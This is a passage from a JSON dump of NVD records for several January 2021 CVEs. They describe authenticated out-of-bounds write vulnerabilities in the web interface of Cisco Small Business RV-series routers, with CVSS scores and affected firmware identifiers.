"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1165", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1165"], "modified": "2021-01-19T19:30:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1165", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1165", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:47:12", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1209", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1209"], "modified": "2021-01-15T19:45:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1209", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1209", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:15", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1162", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1162"], "modified": "2021-01-19T19:36:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1162", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1162", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:47:09", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1206", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1206"], "modified": "2021-01-15T19:46:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1206", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1206", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:24", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1170", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1170"], "modified": "2021-01-19T19:20:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1170", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1170", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:47:14", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1210", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1210"], "modified": "2021-01-15T19:44:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1210", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1210", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:47:03", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1200", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1200"], "modified": "2021-01-19T19:03:00", "cpe": ["cpe:/o:cisco:rv130_firmware:1.2.2.8", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv215w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8"], "id": "CVE-2021-1200", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1200", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv215w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:57", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1194", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1194"], "modified": "2021-01-15T19:50:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1194", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1194", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:47", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1187", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1187"], "modified": "2021-01-15T19:54:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1187", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1187", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:13", 